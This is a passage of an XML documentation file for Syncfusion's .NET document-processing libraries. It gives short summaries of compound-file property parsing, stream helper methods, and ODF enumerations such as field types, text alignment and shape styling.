        <member name="M:Syncfusion.CompoundFile.DocIO.Net.PropertyData.SetValue(System.Object,Syncfusion.CompoundFile.DocIO.PropertyType)">
            <summary>
            Sets property value.
            </summary>
            <param name="value">Value to set.</param>
            <param name="type">Type of the property to set.</param>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.PropertyData.IsLinkToSource">
            <summary>
            Indicates whether it is property or just link to source of some property. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.PropertyData.ParentId">
            <summary>
            Returns id of the parent property. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.PropertyData.Id">
            <summary>
            GEts or sets property id.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.PropertySection.m_iOffset">
            <summary>
            Offset to the section header.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.PropertySection.m_id">
            <summary>
            Section id.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.PropertySection.m_iLength">
            <summary>
            Section size.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.PropertySection.m_lstProperties">
            <summary>
            Contains all section properties.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.PropertySection.m_sCodePage">
            <summary>
            Code page of the section.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.PropertySection.#ctor(System.Guid,System.Int32)">
            <summary>
            Initializes new instance of the section.
            </summary>
            <param name="guid"></param>
            <param name="sectionOffset"></param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.PropertySection.Parse(System.IO.Stream)">
            <summary>
            Extracts properties from the stream.
            </summary>
            <param name="stream">Stream to get section from.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.PropertySection.ParseDictionary(System.IO.Stream,System.Collections.Generic.Dictionary{System.Int32,System.String}@)">
            <summary>
            Parses dictionary based on the internal variables value.
            </summary>
            <param name="stream">Stream to get dictionary from.</param>
            <param name="dictNames">Dictionary to fill if necessary.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.PropertySection.ParsePropertyNames(System.IO.Stream,Syncfusion.CompoundFile.DocIO.Net.PropertySection.DictionaryInfo)">
            <summary>
            Parses property names.
            </summary>
            <param name="stream">Stream to get property data from.</param>
            <param name="dictionaryInfo">Information about dictionary placement inside stream.</param>
            <returns>Parsed dictionary.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.PropertySection.ParseSpecialProperties(Syncfusion.CompoundFile.DocIO.Net.PropertyData,System.IO.Stream,System.Int32,System.Collections.Generic.Dictionary{System.Int32,System.String}@)">
            <summary>
            Parses special properties (they shouldn't be visible to user and they contain some information).
            </summary>
            <param name="property"></param>
            <param name="stream"></param>
            <param name="reservedSize"></param>
            <param name="dictNames"></param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.PropertySection.ParsePropertyNames(System.IO.Stream)">
            <summary>
            Parses property names based on previously stored internal information.
            </summary>
            <param name="stream">Stream to get data from.</param>
            <returns>Parsed dictionary.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.PropertySection.Serialize(System.IO.Stream)">
            <summary>
            Saves section into stream.
            </summary>
            <param name="stream">Stream to save section into.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.PropertySection.PrepareNames">
            <summary>
            Prepares property name dictionary.
            </summary>
            <returns>Dictionary with property names. Key - property id, value - property name.</returns>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.PropertySection.Offset">
            <summary>
            Offset to the section header.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.PropertySection.Id">
            <summary>
            Section id.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.PropertySection.Length">
            <summary>
            Section size.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.PropertySection.Count">
            <summary>
            Properties count.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.PropertySection.Properties">
            <summary>
            Gets list of all properties.
            </summary>
        </member>
        <member name="T:Syncfusion.CompoundFile.DocIO.Net.SectorTypes">
            <summary>
            Contains constants that defines all known sector types.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.StreamHelper.IntSize">
            <summary>
            Size of the Int32 in bytes.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.StreamHelper.ShortSize">
            <summary>
            Size of the Int162 in bytes.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.StreamHelper.DoubleSize">
            <summary>
            Size of the Double in bytes.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.StreamHelper.ReadInt16(System.IO.Stream,System.Byte[])">
            <summary>
            Reads Int16 value from the stream.
            </summary>
            <param name="stream">Stream to get data from.</param>
            <param name="buffer">Temporary buffer to put extracted bytes into.</param>
            <returns>Extracted Int32 value.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.StreamHelper.ReadInt32(System.IO.Stream,System.Byte[])">
            <summary>
            Reads Int32 value from the stream.
            </summary>
            <param name="stream">Stream to get data from.</param>
            <param name="buffer">Temporary buffer to put extracted bytes into.</param>
            <returns>Extracted Int32 value.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.StreamHelper.ReadDouble(System.IO.Stream,System.Byte[])">
            <summary>
            Reads Double value from the stream.
            </summary>
            <param name="stream">Stream to get data from.</param>
            <param name="buffer">Temporary buffer to put extracted bytes into.</param>
            <returns>Extracted Double value.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.StreamHelper.WriteInt16(System.IO.Stream,System.Int16)">
            <summary>
            Writes Int16 value from the stream.
            </summary>
            <param name="stream">Stream to get data from.</param>
            <param name="value">Value to write.</param>
            <returns>Size of the written data.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.StreamHelper.WriteInt32(System.IO.Stream,System.Int32)">
            <summary>
            Writes Int32 value from the stream.
            </summary>
            <param name="stream">Stream to write data into.</param>
            <param name="value">Value to write.</param>
            <returns>Size of the written data.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.StreamHelper.WriteDouble(System.IO.Stream,System.Double)">
            <summary>
            Reads Double value from the stream.
            </summary>
            <param name="stream">Stream to get data from.</param>
            <param name="buffer">Temporary buffer to put extracted bytes into.</param>
            <returns>Extracted Double value.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.StreamHelper.GetAsciiString(System.IO.Stream,System.Int32)">
            <summary>
            Gets ASCII string from the stream starting from the current position.
            </summary>
            <param name="stream">Stream to get data from.</param>
            <param name="roundedSize">Approximate string size.</param>
            <returns>Extracted string.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.StreamHelper.GetAsciiString(System.IO.Stream,System.Int32,System.Int32)">
            <summary>
            Gets ASCII string from the stream starting from the current position.
            </summary>
            <param name="stream">Stream to get data from.</param>
            <param name="roundedSize">Approximate string size.</param>
            <returns>Extracted string.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.StreamHelper.GetUnicodeString(System.IO.Stream,System.Int32)">
            <summary>
            Extracts unicode string from the stream.
            </summary>
            <param name="stream"></param>
            <param name="roundedSize"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.StreamHelper.WriteAsciiString(System.IO.Stream,System.String,System.Boolean)">
            <summary>
            Gets ASCII string from the stream starting from the current position.
            </summary>
            <param name="stream">Stream to get data from.</param>
            <param name="roundedSize">Approximate string size.</param>
            <returns>Extracted string.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.StreamHelper.WriteUnicodeString(System.IO.Stream,System.String)">
            <summary>
            Writes unicode string into steram.
            </summary>
            <param name="stream">Stream to write data into.</param>
            <param name="value">Value to write.</param>
            <returns>Size of the written data in bytes.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.StreamHelper.WriteString(System.IO.Stream,System.String,System.Text.Encoding,System.Boolean)">
            <summary>
            Writes string into stream using specified encoding.
            </summary>
            <param name="stream">Stream to write data into.</param>
            <param name="value">Value to write.</param>
            <param name="encoding">Encoding to use.</param>
            <returns>Size of the written data in bytes.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.StreamHelper.AddPadding(System.IO.Stream,System.Int32@)">
            <summary>
            Adds padding if necessary.
            </summary>
            <param name="stream"></param>
            <param name="iWrittenSize"></param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.StreamHelper.RemoveLastZero(System.String)">
            <summary>
            Removes last zero character from the string if it is present.
            </summary>
            <param name="value">Value to check.</param>
            <returns>String after removal.</returns>
        </member>
        <member name="M:ODF.Base.ODFImplementation.CollectionBase`1.GenerateDefaultName(System.String,System.Collections.ICollection[])">
            <summary>
            Generate default name.
            </summary>
            <param name="strStart">Start string.</param>
            <param name="arrCollections">Collection with names.</param>
            <returns>Returns new name.</returns>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldNone">
            <summary>
             Field type is not Specifies. 
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldAddin">
            <summary>
            Specifies Addins.
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldAdvance">
            <summary>
              Offset subsequent text within a line to the left, right, up or down. 
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldAsk">
            <summary>
             Prompt the user for text to assign to a bookmark. 
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldAuthor">
            <summary>
            The name of the document's author from Summary Info. 
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldAutoNum">
            <summary>
            Insert an automatic number. 
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldAutoNumLegal">
            <summary>
               Insert an automatic number in legal format. 
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldAutoNumOutline">
            <summary>
            Insert an automatic number in outline format.
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldAutoText">
            <summary>
            Insert an AutoText entry. 
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldAutoTextList">
            <summary>
             Insert text based on style. 
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldBarCode">
            <summary>
            Insert a delivery point barcode. 
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldComments">
            <summary>
            The comments from Summary Info. 
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldCompare">
            <summary>
            Compares two values. 
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldCreateDate">
            <summary>
            The date the document was created.
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldData">
            <summary>
            Specifies data. 
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldDatabase">
            <summary>
            Insert data from an external database. 
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldDate">
            <summary>
            Specified Today`s Date.
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldDDE">
            <summary>
            Specified Type as FieldDDE. 
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldDDEAuto">
            <summary>
            Specified Type as FieldDDEAuto. 
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldDocProperty">
            <summary>
             Insert the value of the property.
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldDocVariable">
            <summary>
            Insert the value of the document variable. 
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldEditTime">
            <summary>
            The total document editing time. 
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldEmbed">
            <summary>
            Specifies OLE embedded object.
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldEmpty">
            <summary>
            Specified Empty Field.
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldExpression">
            <summary>
            Specifies Field Expression.
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldFileName">
            <summary>
             The document's name.
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldFileSize">
            <summary>
            The size on disk of the active document. 
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldFillIn">
            <summary>
             Prompt the user for text to insert in the document. 
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldFootnoteRef">
            <summary>
            Specifies FieldType as FootnoteRef.
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldFormCheckBox">
            <summary>
            Specifies Check box control.
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldFormDropDown">
            <summary>
            Specifies Drop Down box control.
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldFormTextInput">
            <summary>
            Specifies Text control.
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldFormula">
            <summary>
             Calculates the result of an expression.
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldGlossary">
            <summary>
            Specifies FieldGlossary.
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldGoToButton">
            <summary>
            Specifies GoToButton control.
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldHTMLActiveX">
            <summary>
            Specifies HTMLActiveX control.
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldHyperlink">
            <summary>
            Specifies Hyperlink control.
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldIf">
            <summary>
            Evaluate arguments conditionally. 
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldImport">
            <summary>
            Specifies FieldType as Import.
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldInclude">
            <summary>
            Specifies FieldType as Export.
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldIncludePicture">
            <summary>
            Insert a picture from a file. 
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldIncludeText">
            <summary>
            Insert text from a file. 
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldIndex">
            <summary>
            Create an index. 
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldIndexEntry">
            <summary>
              Mark an index entry. 
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldInfo">
            <summary>
            Data from Summary Info. 
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldKeyWord">
            <summary>
            The keywords from Summary Info. 
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldLastSavedBy">
            <summary>
            Name of user who last saved the document. 
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldLink">
            <summary>
            Linked OLE2 object.
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldListNum">
            <summary>
            Insert an element in a list. 
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldMacroButton">
            <summary>
            Run a macro. 
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldMergeField">
            <summary>
            Insert a mail merge field. 
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldMergeRec">
            <summary>
            The number of the current merge record.
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldMergeSeq">
            <summary>
            Merge record sequence number. 
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldNext">
            <summary>
            Go to the next record in a mail merge. 
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldNextIf">
            <summary>
            Conditionally go to the next record in a mail merge. 
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldNoteRef">
            <summary>
            Insert the number of a footnote or endnote.
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldNumChars">
            <summary>
            The number of characters in the document. 
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldNumPages">
            <summary>
             The number of pages in the document. 
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldNumWords">
            <summary>
            The number of words in the document. 
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldOCX">
            <summary>
            Represents an ActiveX control such as a command button etc.
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldPage">
            <summary>
            Insert the number of the current page. 
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldPageRef">
            <summary>
            Insert the number of the page containing the specified bookmark. 
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldPrint">
            <summary>
            Download commands to a printer. 
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldPrintDate">
            <summary>
            The date the document was last printed. 
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldPrivate">
            <summary>
            Stores data for documents converted from other file formats.
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldQuote">
            <summary>
            Insert literal text. 
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldRef">
            <summary>
            Insert the text marked by a bookmark. 
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldRefDoc">
            <summary>
            Create an index, table of contents, table of figures, and/or table of authorities by using multiple documents. 
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldRevisionNum">
            <summary>
            Insert the number of times the document has been saved. 
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldSaveDate">
            <summary>
            The date the document was last saved.
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldSection">
            <summary>
            Insert the number of the current section. 
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldSectionPages">
            <summary>
            Insert the total number of pages in the section. 
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldSequence">
            <summary>
            Insert an automatic sequence number. 
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldSet">
            <summary>
            Assign new text to a bookmark. 
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldSkipIf">
            <summary>
            Conditionally skip a record in a mail merge. 
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldStyleRef">
            <summary>
            Insert the text from a like-style paragraph. 
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldSubject">
            <summary>
             The document's subject from Summary Info. 
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldSubscriber">
            <summary>
             The document's Subscriber from Summary Info. 
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldSymbol">
            <summary>
             Insert a special character
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldTemplate">
            <summary>
            The name of the template attached to the document. 
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldTime">
            <summary>
             The current time. 
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldTitle">
            <summary>
            The document's title from Summary Info. 
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldTOA">
            <summary>
            Create a table of authorities. 
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldTOAEntry">
            <summary>
            Make a table of authorities entry. 
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldTOC">
            <summary>
            Create a table of contents. 
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldTOCEntry">
            <summary>
             Make a table of contents entry. 
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldUserAddress">
            <summary>
            Address from Tools Options User Info. 
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldUserInitials">
            <summary>
            Initials form Tools Options User Info. 
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldUserName">
            <summary>
             Name from Tools Options User Info. 
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldShape">
            <summary>
            Specifies FieldType as Shape.
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldBidiOutline">
            <summary>
            Specifies FieldType as BIDIOUTLINE.
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldAddressBlock">
            <summary>
            Specifies AddressBlock
            </summary>
        </member>
        <member name="F:ODF.Base.OFieldType.FieldUnknown">
            <summary>
             Specifies FieldType as Unknown.
            </summary>
        </member>
        <member name="T:ODF.Base.TabStopLeader">
            <summary>
            Tab stop leader
            </summary>
        </member>
        <member name="F:ODF.Base.TabStopLeader.NoLeader">
            <summary>
            No leader.
            </summary>
        </member>
        <member name="F:ODF.Base.TabStopLeader.Dotted">
            <summary>
            Dotted leader.
            </summary>
        </member>
        <member name="F:ODF.Base.TabStopLeader.Hyphenated">
            <summary>
            Hyphenated leader.
            </summary>
        </member>
        <member name="F:ODF.Base.TabStopLeader.Single">
            <summary>
            Single line leader. 
            </summary>
        </member>
        <member name="F:ODF.Base.TabStopLeader.Heavy">
            <summary>
            Heavy line leader.
            </summary>
        </member>
        <member name="F:ODF.Base.HoriAlignment.Left">
            <summary>
            Specifies paragraph text is aligned to the left.
            </summary>
        </member>
        <member name="F:ODF.Base.HoriAlignment.Center">
            <summary>
            Specifies paragraph text is aligned to the center. 
            </summary>
        </member>
        <member name="F:ODF.Base.HoriAlignment.Right">
            <summary>
            Specifies paragraph text is aligned to the right. 
            </summary>
        </member>
        <member name="F:ODF.Base.HoriAlignment.Justify">
            <summary>
            Specifies paragraph text is aligned to both left and right.
            </summary>
        </member>
        <member name="F:ODF.Base.HoriAlignment.Distribute">
            <summary>
            Specifies paragraph characters are distributed to fill the entire width of the paragraph. 
            </summary>
        </member>
        <member name="F:ODF.Base.HoriAlignment.JustifyMedium">
            <summary>
            Specifies paragraph uses medium-length Kashida, if the language is Arabic. In other languages, paragraph text is justified with a medium character compression ratio. 
            </summary>
        </member>
        <member name="F:ODF.Base.HoriAlignment.JustifyHigh">
            <summary>
            Specifies paragraph uses longer length Kashida, if the language is Arabic. In other languages, paragraph text is justified with a high character compression ratio. 
            </summary>
        </member>
        <member name="F:ODF.Base.HoriAlignment.JustifyLow">
            <summary>
            Specifies paragraph uses small length Kashida, if the language is Arabic. In other languages, paragraph text is justified with a high character compression ratio. 
            </summary>
        </member>
        <member name="F:ODF.Base.HoriAlignment.ThaiJustify">
            <summary>
            Specifies paragraph text is justified with Thai distributed justification, if the language is Thai. In other languages, text is justified with a low character compression ratio.
            </summary>
        </member>
        <member name="T:ODF.Base.TextWrappingStyle">
            <summary>
            Specifies the text wrap style.
            </summary>
        </member>
        <member name="F:ODF.Base.TextWrappingStyle.Inline">
            <summary>
            In line with text.
            </summary>
        </member>
        <member name="F:ODF.Base.TextWrappingStyle.TopAndBottom">
            <summary>
            Top and bottom.
            </summary>
        </member>
        <member name="F:ODF.Base.TextWrappingStyle.Square">
            <summary>
            Wraps text around the shape. Line continuation is on the opposite side of the shape.
            </summary>
        </member>
        <member name="F:ODF.Base.TextWrappingStyle.InFrontOfText">
            <summary>
            Places shape in front of text.
            </summary>
        </member>
        <member name="F:ODF.Base.TextWrappingStyle.Tight">
            <summary>
            Tight.
            </summary>
        </member>
        <member name="F:ODF.Base.TextWrappingStyle.Through">
            <summary>
            Through.
            </summary>
        </member>
        <member name="F:ODF.Base.TextWrappingStyle.Behind">
            <summary>
            Places shape behind text.
            </summary>
        </member>
        <member name="T:ODF.Base.CaptionAngleType">
            <summary>
            Represents the caption angle type.
            </summary>
        </member>
        <member name="F:ODF.Base.CaptionAngleType.Fixed">
            <summary>
            Fixed caption angle type.
            </summary>
        </member>
        <member name="F:ODF.Base.CaptionAngleType.Free">
            <summary>
            Free caption angle type.
            </summary>
        </member>
        <member name="T:ODF.Base.CaptionEscapeDirection">
            <summary>
            Represents the caption escape direction.
            </summary>
        </member>
        <member name="F:ODF.Base.CaptionEscapeDirection.Horizontal">
            <summary>
            Horizontal caption escape direction.
            </summary>
        </member>
        <member name="F:ODF.Base.CaptionEscapeDirection.Vertical">
            <summary>
            Vertical caption escape direction.
            </summary>
        </member>
        <member name="F:ODF.Base.CaptionEscapeDirection.Auto">
            <summary>
            Auto caption escape direction.
            </summary>
        </member>
        <member name="T:ODF.Base.CaptionType">
            <summary>
            Represents the caption type.
            </summary>
        </member>
        <member name="F:ODF.Base.CaptionType.StraightLine">
            <summary>
            Straight line caption type.
            </summary>
        </member>
        <member name="F:ODF.Base.CaptionType.AngledLine">
            <summary>
            Angled line caption type.
            </summary>
        </member>
        <member name="F:ODF.Base.CaptionType.AngledConnectorLine">
            <summary>
            Angled connector line caption type.
            </summary>
        </member>
        <member name="T:ODF.Base.ColorMode">
            <summary>
            Represents the color mode.
            </summary>
        </member>
        <member name="F:ODF.Base.ColorMode.Greyscale">
            <summary>
            Greyscale color mode.
            </summary>
        </member>
        <member name="F:ODF.Base.ColorMode.Mono">
            <summary>
            Mono color mode.
            </summary>
        </member>
        <member name="F:ODF.Base.ColorMode.Watermark">
            <summary>
            Watermark color mode.
            </summary>
        </member>
        <member name="T:ODF.Base.DrawAspect">
            <summary>
            Represents the draw aspect.
            </summary>
        </member>
        <member name="F:ODF.Base.DrawAspect.Content">
            <summary>
            Content draw aspect.
            </summary>
        </member>
        <member name="F:ODF.Base.DrawAspect.Thumbnail">
            <summary>
            Thumbnail draw aspect.
            </summary>
        </member>
        <member name="F:ODF.Base.DrawAspect.Icon">
            <summary>
            Icon draw aspect.
            </summary>
        </member>
        <member name="F:ODF.Base.DrawAspect.Printview">
            <summary>
            Print view draw aspect.
            </summary>
        </member>
        <member name="T:ODF.Base.FillType">
            <summary>
            Represents drawing fill type.
            </summary>
        </member>
        <member name="F:ODF.Base.FillType.None">
            <summary>
            No fill.
            </summary>
        </member>
        <member name="F:ODF.Base.FillType.Solid">
            <summary>
            Solid fill.
            </summary>
        </member>
        <member name="F:ODF.Base.FillType.Bitmap">
            <summary>
            Bitmap fill.
            </summary>
        </member>
        <member name="F:ODF.Base.FillType.Gradient">
            <summary>
            Gradient fill.
            </summary>
        </member>
        <member name="F:ODF.Base.FillType.Hatch">
            <summary>
            Hatch fill.
            </summary>
        </member>
        <member name="T:ODF.Base.RefPoint">
            <summary>
            Represents reference point for image.
            </summary>
        </member>
        <member name="F:ODF.Base.RefPoint.TopLeft">
            <summary>
            Top left.
            </summary>
        </member>
        <member name="F:ODF.Base.RefPoint.Top">
            <summary>
            Top.
            </summary>
        </member>
        <member name="F:ODF.Base.RefPoint.TopRight">
            <summary>
            Top right.
            </summary>
        </member>
        <member name="F:ODF.Base.RefPoint.Left">
            <summary>
            Left.
            </summary>
        </member>
        <member name="F:ODF.Base.RefPoint.Center">
            <summary>
            Center.
            </summary>
        </member>
        <member name="F:ODF.Base.RefPoint.Right">
            <summary>
            Right.
            </summary>
        </member>
        <member name="F:ODF.Base.RefPoint.BottomLeft">
            <summary>
            Bottom left.
            </summary>
        </member>
        <member name="F:ODF.Base.RefPoint.Bottom">
            <summary>
            Bottom.
            </summary>
        </member>
        <member name="F:ODF.Base.RefPoint.BottomRight">
            <summary>
            Bottom right.
            </summary>
        </member>
        <member name="T:ODF.Base.MeasureAlign">
            <summary>
            Represents measure align type.
            </summary>
        </member>
        <member name="F:ODF.Base.MeasureAlign.Automatic">
            <summary>
            Autmatic measure align.
            </summary>
        </member>
        <member name="F:ODF.Base.MeasureAlign.LeftOutside">
            <summary>
            Left outside measure align.
            </summary>
        </member>
        <member name="F:ODF.Base.MeasureAlign.Inside">
            <summary>
            Inside measure align.
            </summary>
        </member>
        <member name="F:ODF.Base.MeasureAlign.RightOutside">
            <summary>
            Right outside measure align.
            </summary>
        </member>
        <member name="T:ODF.Base.MeasureVerticalAlign">
            <summary>
            Represents vertical measure align.
            </summary>
        </member>
        <member name="F:ODF.Base.MeasureVerticalAlign.Automatic">
            <summary>
            Automatic vertical measure align.
            </summary>
        </member>
        <member name="F:ODF.Base.MeasureVerticalAlign.Above">
            <summary>
            Above vertical measure align.
            </summary>
        </member>
        <member name="F:ODF.Base.MeasureVerticalAlign.Below">
            <summary>
            Below vertical measure align.
            </summary>
        </member>
        <member name="F:ODF.Base.MeasureVerticalAlign.Center">
            <summary>
            Center vertical measure align.
            </summary>
        </member>
        <member name="T:ODF.Base.Shadow">
            <summary>
            Represents shadow.
            </summary>
        </member>
        <member name="F:ODF.Base.Shadow.Visible">
            <summary>
            Visible shadow.
            </summary>
        </member>
        <member name="F:ODF.Base.Shadow.Hidden">
            <summary>
            Hidden shadow.
            </summary>
        </member>
        <member name="T:ODF.Base.Stroke">
            <summary>
            Represents stroke.
            </summary>
        </member>
        <member name="F:ODF.Base.Stroke.None">
            <summary>
            No stroke.
            </summary>
        </member>
        <member name="F:ODF.Base.Stroke.Dash">
            <summary>
            Dash stroke.
            </summary>
        </member>
        <member name="F:ODF.Base.Stroke.Solid">
            <summary>
            Solid stroke.
            </summary>
        </member>
        <member name="T:ODF.Base.StrokeLineJoin">
            <summary>
            Represents stroke line join.
            </summary>
        </member>
        <member name="F:ODF.Base.StrokeLineJoin.Miter">
            <summary>
            Miter join.
            </summary>
        </member>
        <member name="F:ODF.Base.StrokeLineJoin.Round">
            <summary>
            Round join.
            </summary>
        </member>
        <member name="F:ODF.Base.StrokeLineJoin.Bevel">
            <summary>
            Bevel join.
            </summary>
        </member>
        <member name="F:ODF.Base.StrokeLineJoin.Middle">
            <summary>
            Middle join.
            </summary>
        </member>
        <member name="F:ODF.Base.StrokeLineJoin.None">
            <summary>
            No join.
            </summary>
        </member>
        <member name="F:ODF.Base.StrokeLineJoin.Inherit">
            <summary>
            Inherited join.
            </summary>
        </member>
        <member name="T:ODF.Base.TextAreaHAlign">
            <summary>
            Represents text area horizontal alignment.
            </summary>
        </member>
